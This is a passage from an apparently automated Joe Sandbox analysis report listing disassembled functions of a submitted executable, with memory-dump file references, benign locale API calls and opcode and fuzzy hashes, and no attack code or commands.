                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                                                                                                                  • Opcode ID: a408e87f9bba439aae4cf5edb2ab6f4a0e390ea9f4e1ae685b3592893f37ebae
                                                                                                                                                                                                                                                                  • Instruction ID: f3a966c4fcd0227970f9266c39830beab2e8591ed377671ab2e9d6080aa22687
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a408e87f9bba439aae4cf5edb2ab6f4a0e390ea9f4e1ae685b3592893f37ebae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75F05C35B0024597CB049F39C8557667F91EFC1714F06405AEE068BB41C6719842C7D0
                                                                                                                                                                                                                                                                  Function 006C4389 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,?,?), ref: 006C43BD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                  • Opcode ID: 08eaf533caf6b2811d81d95633b6ce1ca203d4c834b596f9909d7daafe3f1151
                                                                                                                                                                                                                                                                  • Instruction ID: 3efc81adaabee1712a2a6854700e1573ffd306bc83aa45980581eeb36ab0b65d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08eaf533caf6b2811d81d95633b6ce1ca203d4c834b596f9909d7daafe3f1151
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE04F35500128BBCF126F61EC14FFE3E16EF45760F008119FD5965260CF758E21AAD9
                                                                                                                                                                                                                                                                  Function 006C382E Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(Function_00093629,00000001), ref: 006C3848
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                                                                                                                  • Opcode ID: e4b947c7981557d3e21eddcf3783723622815a7f44125e70edd854d43539e4b1
                                                                                                                                                                                                                                                                  • Instruction ID: 467504f19d68bce7132c27e7d9d245391df4a35334d54ba88f2aa2f4cfc7c525
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4b947c7981557d3e21eddcf3783723622815a7f44125e70edd854d43539e4b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7D05E79504308EFDB045B52FC0A9153B66E3C2310B00C01BF806067A1DB7698108E88
                                                                                                                                                                                                                                                                  Function 006EE400 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Zero
                                                                                                                                                                                                                                                                  • API String ID: 0-200040108
                                                                                                                                                                                                                                                                  • Opcode ID: ac9256ae9bda6e07616a4dac0c570027a9c5c569507057adca8869896eaf5caf
                                                                                                                                                                                                                                                                  • Instruction ID: 35d65879b92dba6d0d69ab9801e0368162f3715fa5422b478bbfc7692bd30fdf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac9256ae9bda6e07616a4dac0c570027a9c5c569507057adca8869896eaf5caf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B38156719022AE9BCB24DB65E9987E8B7F2FF19304F1441E9E84993390E3365E81CF04
                                                                                                                                                                                                                                                                  Function 006D26F0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: `nt
                                                                                                                                                                                                                                                                  • API String ID: 0-461431102
                                                                                                                                                                                                                                                                  • Opcode ID: c94e4018ff227f3b3a76ede4d58b58ff4ddd7aa23aa736906b2a58cd6996eb5a
                                                                                                                                                                                                                                                                  • Instruction ID: d36bd10769ff9877fefec999f54ab802f737148bd7bad48c6a0d803ba96e35dd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c94e4018ff227f3b3a76ede4d58b58ff4ddd7aa23aa736906b2a58cd6996eb5a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AF09072A542359BC7369A5CCA29B9473EAFB2AB10F110057E111EB350C2B5DE00C7C4
                                                                                                                                                                                                                                                                  Function 006D24A5 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: `nt
                                                                                                                                                                                                                                                                  • API String ID: 0-461431102
                                                                                                                                                                                                                                                                  • Opcode ID: 1a743c8d9038b33c6962dd91c8bbf3126eaf9621ae7cb1311f10260607313bd2
                                                                                                                                                                                                                                                                  • Instruction ID: aebd220cdfd8317012984cb308aa83d8dd4fa04f284badd24547558f808d5c94
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a743c8d9038b33c6962dd91c8bbf3126eaf9621ae7cb1311f10260607313bd2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3F0B435A44206EFC715CF2CC928F5677EAFB95304F204066F905D7390D671DE40D640
                                                                                                                                                                                                                                                                  Function 006D265E Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: \nt
                                                                                                                                                                                                                                                                  • API String ID: 0-921828810
                                                                                                                                                                                                                                                                  • Opcode ID: 8337eb67d7ae5452d7eceaf49319b66047a5b7879dece3f23d73224e13b5ded3
                                                                                                                                                                                                                                                                  • Instruction ID: 1ad5ed15edb32d3de3cd003dc47a15dfadc500f56b59bc999b107ba9dd011ed7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8337eb67d7ae5452d7eceaf49319b66047a5b7879dece3f23d73224e13b5ded3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F03071A113649BCB16DB4CD415A8973EDEB59B54F1140ABE401D7351C7B4DD00C7C4
                                                                                                                                                                                                                                                                  Function 006D2609 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Xnt
                                                                                                                                                                                                                                                                  • API String ID: 0-838358294
                                                                                                                                                                                                                                                                  • Opcode ID: ba8837837dc3827eebe8ae2e5a2a0f74143aadca36fe603af9815a7b170bd7da
                                                                                                                                                                                                                                                                  • Instruction ID: 16d4f3bbd9aee887dd4b7ae42cb3cc9fcf09a3cf9c170da2e3882b08721fe156
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba8837837dc3827eebe8ae2e5a2a0f74143aadca36fe603af9815a7b170bd7da
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAF03932A113B4AFCB26CB88D815A9973E9EB56B61F1640AAF541EB354C3B4DE40C7C4
                                                                                                                                                                                                                                                                  Function 006D23FF Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Xnt
                                                                                                                                                                                                                                                                  • API String ID: 0-838358294
                                                                                                                                                                                                                                                                  • Opcode ID: 2cb9b0ee128dc00c83b55e9bc2a6d2e0b3f4a0d70f3270a38316b126282f1d56
                                                                                                                                                                                                                                                                  • Instruction ID: 41723d2a646d49aa5b9aeb28b07c90dd31c9c4b1ad702e51582a6353eafcb6f4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cb9b0ee128dc00c83b55e9bc2a6d2e0b3f4a0d70f3270a38316b126282f1d56
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69E0657AA00354EFCB4ACFA9C554A4AB7E9EB49744F2144AAE809C7350D338DE41CB41
                                                                                                                                                                                                                                                                  Function 006D2452 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
